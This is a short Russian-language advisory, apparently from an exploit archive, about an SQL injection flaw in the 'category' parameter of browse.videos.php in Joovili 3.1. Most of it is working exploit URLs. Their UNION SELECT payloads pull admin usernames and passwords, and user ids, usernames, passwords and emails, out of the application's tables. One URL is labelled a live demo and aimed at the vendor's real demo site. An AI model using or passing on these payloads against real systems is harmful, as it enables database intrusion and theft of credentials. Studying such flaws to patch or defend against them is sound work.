Программа: Joovili 3.1
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «category» сценарием browse.videos.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Эксплоит:
http:hacker_egy/browse.videos.php?category=-1/**/union/**/select/* */1,2,3,concat_ws(0x3a3a,admin_username,admin_password),5,user(),7,8,9/**/from/**/joovili_admins/*
http://hacker_egy/browse.videos.php?category=-1/**/union/**/select/* */1,2,3,concat_ws(0x3a3a,id,username,password,email),5,user(),7,8,9/**/from/**/joovili_users/*
L!Ve DeM0:
http://demo.joovili.com/browse.videos.php?category=-1/**/union/**/select/* */1,2,3,concat_ws(0x3a3a,admin_username,admin_password),5,6,7,8,9/**/from/**/joovili_admins/*
